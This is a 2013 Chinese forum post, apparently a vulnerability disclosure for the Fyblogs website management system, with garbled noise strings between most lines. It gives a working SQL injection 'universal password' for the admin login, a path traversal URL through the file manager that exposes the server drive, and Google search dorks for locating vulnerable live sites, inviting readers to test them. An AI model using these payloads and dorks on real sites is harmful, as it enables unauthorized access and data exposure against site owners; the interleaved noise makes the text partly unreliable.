漏洞类型: 未授权访问/权限绕过
) ?5 r( r4 c% G) G9 ]
3 o% S- F6 o8 F; a简要描述:
. a. n* Z0 q# b' d& P5 ^
# e) v8 y- _* i N+ AFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. c# z% l; z, ^
9 c, b% x1 ^1 v7 j7 J. ?8 ?" C
详细说明:
2 Y( U* H3 ]# f/ ]; f
# O& j0 Q. b! | c后台万能密码 'or'='or'
' k8 H( a6 f! v: b9 J后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 {3 @' b1 Q* ]4 Y# y1 f" Qadmin/uploadfile.asp?currentFolder=/upfiles/../
3 x; K, e j) T& F+ n" o( ]* l& s; d1 l# U# x
漏洞证明:
T2 [, m% X; ?- l$ B6 }" l Z% Q8 z$ k( v
谷歌:inurl:type.asp?id=1 新闻中心
; \1 X/ Q: M7 o6 _或者 :inurl:download_ok.asp?
$ u% z; r! [4 \0 h y" ^6 I. A9 i( o1 k9 c( W
可以测试1 n9 @$ ^( U- J+ O1 G/ B
5 }5 P7 ]0 e L$ ^
. C% p1 ~8 b9 D2 |7 w; g3 ?5 L |
发表于 2013-3-7 13:07:46
收藏
支持
反对